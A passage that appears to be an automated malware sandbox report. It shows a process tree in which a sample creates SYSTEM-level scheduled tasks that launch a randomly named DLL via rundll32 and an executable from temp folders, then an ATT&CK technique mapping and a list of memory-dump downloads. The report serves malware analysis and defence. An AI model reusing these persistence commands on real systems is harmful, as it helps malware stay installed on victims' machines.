  schtasks /CREATE /TN "PcFGIyIlUJyYablHCHc2" /F /xml "C:\Program Files (x86)\NMbcPgNClKinC\VANzzHh.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:9672
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "nMmJzTJTMvgDqJXEl" /SC once /ST 03:53:22 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\nyFjvKGtfVGLAKAU\zwjTlmrA\GcgVJLc.dll\",#1 /site_id 668658" /V1 /F
  2⤵
  - Creates scheduled task(s)
  PID:9748
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "nMmJzTJTMvgDqJXEl"
  2⤵
  PID:2728
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "spuIGIeyqnGn" /SC once /ST 02:52:00 /F /RU "Admin" /TR "\"C:\Users\Admin\AppData\Local\Temp\nitzTrLPrXGkZCFFk\ktbVNzSQ\SJLKiqz.exe\" 3L /S"
  2⤵
  - Creates scheduled task(s)
  PID:7556

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:8340

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:9536

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:9916

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe
"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe" /update
1⤵
PID:9620

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:9292

\??\c:\windows\system32\rundll32.EXE
c:\windows\system32\rundll32.EXE "C:\Windows\Temp\nyFjvKGtfVGLAKAU\zwjTlmrA\GcgVJLc.dll",#1 /site_id 668658
1⤵
PID:1140
- C:\Windows\SysWOW64\rundll32.exe
  c:\windows\system32\rundll32.EXE "C:\Windows\Temp\nyFjvKGtfVGLAKAU\zwjTlmrA\GcgVJLc.dll",#1 /site_id 668658
  2⤵
  PID:6340

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Web Service

T1102

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/916-352-0x0000026727B40000-0x0000026727BB4000-memory.dmp

Filesize
464KB

Download
memory/1016-323-0x0000026D26410000-0x0000026D26484000-memory.dmp

Filesize
464KB

Download
memory/1072-354-0x000001EDD5DD0000-0x000001EDD5E44000-memory.dmp

Filesize
464KB

Download
memory/1144-144-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/1144-141-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/1144-134-0x000000006B280000-0x000000006B2A6000-memory.dmp

Filesize
152KB

Download
memory/1144-147-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/1144-133-0x000000006FE40000-0x000000006FFC6000-memory.dmp

Filesize
1.5MB

Download
memory/1144-138-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/1144-132-0x000000006B440000-0x000000006B4CF000-memory.dmp

Filesize
572KB

Download
memory/1208-371-0x000002B6FB340000-0x000002B6FB3B4000-memory.dmp

Filesize
464KB

Download
memory/1280-383-0x000001CE44B60000-0x000001CE44BD4000-memory.dmp

Filesize
464KB

Download
memory/1336-358-0x000001F2D1D50000-0x000001F2D1DC4000-memory.dmp

Filesize
464KB

Download
memory/1804-367-0x000001508D270000-0x000001508D2E4000-memory.dmp

Filesize
464KB

Download
memory/2208-304-0x0000000000540000-0x0000000000555000-memory.dmp

Filesize
84KB

Download
memory/2356-337-0x00000281C1540000-0x00000281C15B4000-memory.dmp

Filesize
464KB

Download
memory/2372-334-0x000001C378280000-0x000001C3782F4000-memory.dmp

Filesize
464KB

Download
memory/2532-306-0x000001B629160000-0x000001B6291D4000-memory.dmp

Filesize
464KB

Download
memory/2532-311-0x000001B629060000-0x000001B6290AD000-memory.dmp

Filesize
308KB

Download
memory/2640-384-0x00000213BFC70000-0x00000213BFCE4000-memory.dmp

Filesize
464KB

Download
memory/2656-390-0x0000024FC1640000-0x0000024FC16B4000-memory.dmp

Filesize
464KB

Download
memory/2676-321-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/2764-260-0x0000000000980000-0x0000000000A54000-memory.dmp

Filesize
848KB

Download
memory/2764-262-0x0000000000400000-0x00000000004D7000-memory.dmp

Filesize
860KB

Download
memory/3184-256-0x0000000000400000-0x000000000044D000-memory.dmp

Filesize
308KB

Download
memory/3184-253-0x0000000000030000-0x0000000000039000-memory.dmp

Filesize
36KB

Download
memory/3344-295-0x0000000004C60000-0x0000000004CBF000-memory.dmp

Filesize
380KB

Download
memory/3344-292-0x0000000004A9A000-0x0000000004B9B000-memory.dmp

Filesize
1.0MB

Download
memory/3828-336-0x0000000007F10000-0x0000000007F11000-memory.dmp

Filesize
4KB

Download
memory/3828-242-0x0000000007B60000-0x0000000007B61000-memory.dmp

Filesize
4KB

Download
memory/3828-209-0x0000000004622000-0x0000000004623000-memory.dmp

Filesize
4KB

Download
memory/3828-201-0x0000000004620000-0x0000000004621000-memory.dmp

Filesize
4KB

Download
memory/3828-280-0x0000000006E10000-0x0000000006E11000-memory.dmp

Filesize
4KB

Download
memory/3828-229-0x0000000006CA0000-0x0000000006CA1000-memory.dmp

Filesize
4KB

Download
memory/3828-226-0x0000000007700000-0x0000000007701000-memory.dmp

Filesize
4KB

Download
memory/3828-289-0x00000000080E0000-0x00000000080E1000-memory.dmp

Filesize
4KB

Download
memory/3828-220-0x0000000007690000-0x0000000007691000-memory.dmp

Filesize
4KB

Download
memory/3828-199-0x0000000004500000-0x0000000004501000-memory.dmp

Filesize
4KB

Download
memory/3828-224-0x0000000006D20000-0x0000000006D21000-memory.dmp

Filesize
4KB

Download
memory/3828-208-0x0000000006E40000-0x0000000006E41000-memory.dmp

Filesize
4KB

Download
memory/3828-218-0x0000000006CF0000-0x0000000006CF1000-memory.dmp

Filesize
4KB

Download
memory/3828-217-0x0000000006B80000-0x0000000006B81000-memory.dmp

Filesize
4KB

Download
memory/3988-177-0x0000000000190000-0x0000000000191000-memory.dmp

Filesize
4KB

Download
memory/3988-197-0x0000000000A30000-0x0000000000A31000-memory.dmp

Filesize
4KB

Download
memory/3988-207-0x0000000002060000-0x0000000002062000-memory.dmp

Filesize
8KB

Download
memory/4152-216-0x0000000005BE0000-0x0000000005BE1000-memory.dmp

Filesize
4KB

Download
memory/4152-212-0x00000000056A0000-0x00000000056A1000-memory.dmp

Filesize
4KB

Download
memory/4152-202-0x0000000000E50000-0x0000000000E51000-memory.dmp

Filesize
4KB

Download
memory/4160-246-0x0000000000470000-0x000000000051E000-memory.dmp

Filesize
696KB

Download
memory/4160-249-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/4168-200-0x000000001B0D0000-0x000000001B0D2000-memory.dmp

Filesize
8KB

Download
memory/4168-186-0x0000000000310000-0x0000000000311000-memory.dmp

Filesize
4KB

Download
memory/4172-324-0x000001891A070000-0x000001891A0E4000-memory.dmp

Filesize
464KB

Download
memory/4204-195-0x00000226E5740000-0x00000226E5741000-memory.dmp

Filesize
4KB

Download
memory/4204-205-0x00000226E7400000-0x00000226E7402000-memory.dmp

Filesize
8KB

Download
memory/4204-206-0x00000226E7370000-0x00000226E737B000-memory.dmp

Filesize
44KB

Download
memory/4204-235-0x00000226E7404000-0x00000226E7405000-memory.dmp

Filesize
4KB

Download
memory/4204-234-0x00000226E7405000-0x00000226E7407000-memory.dmp

Filesize
8KB

Download
memory/4204-233-0x00000226E7402000-0x00000226E7404000-memory.dmp

Filesize
8KB

Download
memory/4204-213-0x0000022680290000-0x0000022680291000-memory.dmp

Filesize
4KB

Download
memory/4204-221-0x00000226832D0000-0x000002268334E000-memory.dmp

Filesize
504KB

Download
memory/4248-394-0x0000000000400000-0x0000000000458000-memory.dmp

Filesize
352KB

Download
memory/4248-393-0x00000000001D0000-0x00000000001FF000-memory.dmp

Filesize
188KB

Download
memory/4260-349-0x0000000077020000-0x00000000771AE000-memory.dmp

Filesize
1.6MB

Download
memory/4312-203-0x0000000000400000-0x000000000042E000-memory.dmp

Filesize
184KB

Download
memory/4352-308-0x00000000054A0000-0x0000000005532000-memory.dmp

Filesize
584KB

Download
memory/4352-293-0x00000000055E0000-0x00000000055E1000-memory.dmp

Filesize
4KB

Download
memory/4352-331-0x0000000005A30000-0x0000000005A33000-memory.dmp

Filesize
12KB

Download
memory/4352-283-0x0000000000CF0000-0x0000000000CF1000-memory.dmp

Filesize
4KB

Download
memory/4352-312-0x00000000055A0000-0x00000000055B8000-memory.dmp

Filesize
96KB

Download
memory/4352-285-0x0000000005AE0000-0x0000000005AE1000-memory.dmp

Filesize
4KB

Download
memory/4436-422-0x0000000004AC0000-0x0000000004AC1000-memory.dmp

Filesize
4KB

Download
memory/4436-424-0x0000000000400000-0x0000000000460000-memory.dmp

Filesize
384KB

Download
memory/4436-420-0x0000000000590000-0x00000000006DA000-memory.dmp

Filesize
1.3MB

Download
memory/4472-214-0x00000000001E0000-0x00000000001E1000-memory.dmp

Filesize
4KB

Download
memory/4600-316-0x000001E119A80000-0x000001E119A82000-memory.dmp

Filesize
8KB

Download
memory/4600-350-0x000001E119A82000-0x000001E119A84000-memory.dmp

Filesize
8KB

Download
memory/4600-357-0x000001E119A84000-0x000001E119A85000-memory.dmp

Filesize
4KB

Download
memory/4600-364-0x000001E119A85000-0x000001E119A87000-memory.dmp

Filesize
8KB

Download
memory/4600-305-0x000001E117DF0000-0x000001E117DF1000-memory.dmp

Filesize
4KB

Download
memory/4688-232-0x0000000002860000-0x0000000002862000-memory.dmp

Filesize
8KB

Download
memory/4700-294-0x000000001B4F0000-0x000000001B4F2000-memory.dmp

Filesize
8KB

Download
memory/4700-288-0x00000000008F0000-0x00000000008F1000-memory.dmp

Filesize
4KB

Download
memory/4744-230-0x0000000000440000-0x0000000000441000-memory.dmp

Filesize
4KB

Download
memory/4868-263-0x0000000001320000-0x0000000001321000-memory.dmp

Filesize
4KB

Download
memory/4868-250-0x0000000000C40000-0x0000000000C41000-memory.dmp

Filesize
4KB

Download
memory/4868-279-0x00000000031E0000-0x00000000031E1000-memory.dmp

Filesize
4KB

Download
memory/4884-396-0x00000000001E0000-0x00000000001E1000-memory.dmp

Filesize
4KB

Download
memory/4916-411-0x0000000005890000-0x0000000005891000-memory.dmp

Filesize
4KB

Download
memory/4916-359-0x0000000077020000-0x00000000771AE000-memory.dmp

Filesize
1.6MB

Download
memory/4968-244-0x0000000000B90000-0x0000000000B91000-memory.dmp

Filesize
4KB

Download
memory/4968-408-0x0000000003640000-0x0000000003642000-memory.dmp

Filesize
8KB

Download
memory/5012-251-0x0000000000710000-0x0000000000711000-memory.dmp

Filesize
4KB

Download
memory/5012-281-0x000000001B380000-0x000000001B382000-memory.dmp

Filesize
8KB

Download
memory/5012-265-0x00000000027E0000-0x00000000027E1000-memory.dmp

Filesize
4KB

Download
memory/5116-259-0x00000000009A0000-0x00000000009A1000-memory.dmp

Filesize
4KB

Download
memory/5116-264-0x000000001B700000-0x000000001B702000-memory.dmp

Filesize
8KB

Download
memory/5208-377-0x0000000004DE0000-0x00000000053E6000-memory.dmp

Filesize
6.0MB

Download
memory/5208-342-0x0000000000400000-0x0000000000401000-memory.dmp

Filesize
4KB

Download
memory/5208-326-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/5280-345-0x00000000001E0000-0x00000000001E1000-memory.dmp

Filesize
4KB

Download
memory/5396-418-0x0000000004A10000-0x0000000004A11000-memory.dmp

Filesize
4KB

Download
memory/5568-346-0x0000000000ED0000-0x0000000000ED1000-memory.dmp

Filesize
4KB

Download
memory/5568-362-0x0000000005750000-0x0000000005751000-memory.dmp

Filesize
4KB

Download
memory/6048-379-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download